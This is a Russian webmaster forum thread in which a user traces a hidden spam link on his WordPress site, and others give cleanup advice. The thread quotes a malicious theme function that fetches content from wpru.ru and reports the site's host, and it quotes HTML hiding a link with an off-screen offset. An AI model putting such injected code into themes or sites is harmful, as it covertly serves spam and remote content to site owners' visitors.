- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Зачем быть уникальным в мире, где все можно скопировать
Почему так важна уникальность текста и как она влияет на SEO
Ingate Organic
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Скачал с хостинга весь дистрибутив сайта, через программу поиска по всем файлам текстовым, пхп, скриптам и искал текст, ссылку, ничего не нашел :(.
При смене темы на стандартную и другию ссылка весит на сайте. Можно ее увидеть через исходный код сайта. А просто на сайте её не видно, где я мышкой только не пытался найти.
Если честно я просто ошарашен с этой ссылкой :(.
Может дадите совет какой как найти её, но я уже низнаю как. А движек сайта я не буду обновлять, т.к. я этого не делал никогда, вдруг возникнут сложности, плагины могут перестать работать, как я почитал...:(
Буду пробовать пытаться что-то сделать еще, ведь я должен узнать как её заныкали\внедрили!!!
Sergiys добавил 02.11.2010 в 23:05
Да тема тут не причем, ведь если её поставить на другой домен то всё окей. Движек тоже нормальный, на других сайтах он же стоит - все впорядке.
Sergiys добавил 02.11.2010 в 23:09
Тему проверял через админку. ФТП я плохо соображаю что это :(
Sergiys, попробуйте тему с сайта удалить и закачать опять.
Ещё вариант - если это действительно вирус, а вы ничего недавно с этой темой не делали, то поможет просмотр дат создания, т.е. если все файлы темы созданы в марте, а один - в октябре, значит, с ним что-то не то.
ФТП я плохо соображаю что это
видимо причина здесь, и в вашей локальной машине... может вы еще и Тотал Командером пользуетесь?
Из измененных файлов показывает wp-config в июне, а все остальные в марте. фишка еще в том, что я раньше не обращал внимания на исходащие ссылки, потому что сайт был почти пуст и тупо простаивал. Но в этом измененном файле я ничего подозрительного не вижу, никаких ссылок, никаких зашифрованных каракулей и т.п.
angr я тотал коммандером не пользуюсь и не понимаю причем тут он :(
А зачем мне нужен фтп? Вот надо мне материал добавить я зайду в панельку и добавлю. Надо файл залить на хостинг я зайду туда просто и залью, базу создам и т.п. А фтп - зачем? Если может мне это чем то помочь будьте добры обясните и объясните в двух словах что это, если можно :(
Спасибо!
Сейчас уже поздно, второй день пытаюсь ссылку найти, голова кругом. Завтра попробую перезалить тему :( спасибо за совет.
Sergiys добавил 03.11.2010 в 03:30
думал это может:
function bloqinfo($wp_id){
static $wp_count = 0;
if($wp_count == 0){
$wp_count++;
return @file_get_contents('http://wpru.ru/aksimet.php?id='.$wp_id.'&host='.$_SERVER['HTTP_HOST'].'&m=06');
}
}
стёр, на сайте вылезла ошибка. вернул назад. ну на мой взгляд было подозрительно :(
Sergiys добавил 03.11.2010 в 03:46
<p style="position:absolute;left:-670px"><a href="http://timeluxury.ru">timeluxury.ru</a></p>
и вот где цифорки -670 на этом месте постоянно меняются цифры в исходном коде при обновлении. обычно -5xx-6xx
Sergiys,
Ну, FTP переводится с английского "протокол передачи данных", и он позволяет Вам работать с дисками в интернете, как с дисками на своём компьютере. Для борьбы с вирусами это может помочь, как я уже говорил, возможностью просмотра дат создания файлов, также можно смотреть - не добавили ли вам на сайт чего-нибудь явно лишнего.
Про "тотал командер" постоянно упоминают, потому что из него трояны воруют пароли на фтп, предоставляя злоумышленникам доступ к сайтам.
Значит, это должна быть какая-то программная вставка в тему.
1.Переустанови wp и тему заново.
2.Если не поможет - сделай дамп базы, открой её в любом текстовом редакторе и попробуй найти timeluxury.ru, если найдешь - удали.
В принципе один из этих вариантов должен помочь, потому как больше прятаться негде.
После излечения поставь плагин belavir (проверка целостности файлов), он сообщает о любых изменениях в файлах.
Sergiys добавил 03.11.2010 в 03:30
думал это может:
function bloqinfo($wp_id){
static $wp_count = 0;
if($wp_count == 0){
$wp_count++;
return @file_get_contents('http://wpru.ru/aksimet.php?id='.$wp_id.'&host='.$_SERVER['HTTP_HOST'].'&m=06');
}
}
стёр, на сайте вылезла ошибка. вернул назад. ну на мой взгляд было подозрительно :(
Sergiys добавил 03.11.2010 в 03:46
<p style="position:absolute;left:-670px"><a href="http://timeluxury.ru">timeluxury.ru</a></p>
и вот где цифорки -670 на этом месте постоянно меняются цифры в исходном коде при обновлении. обычно -5xx-6xx
Ты был прав насчет подозрительности этого кода, ссылки как раз он и выводит,
У меня была аналогичная проблема, решение нашел вот тут:
http://www.cmshelper.ru/skrytye-ssylki-vo-vsekh-shablonakh-s-sajjta-wordpresse-ru/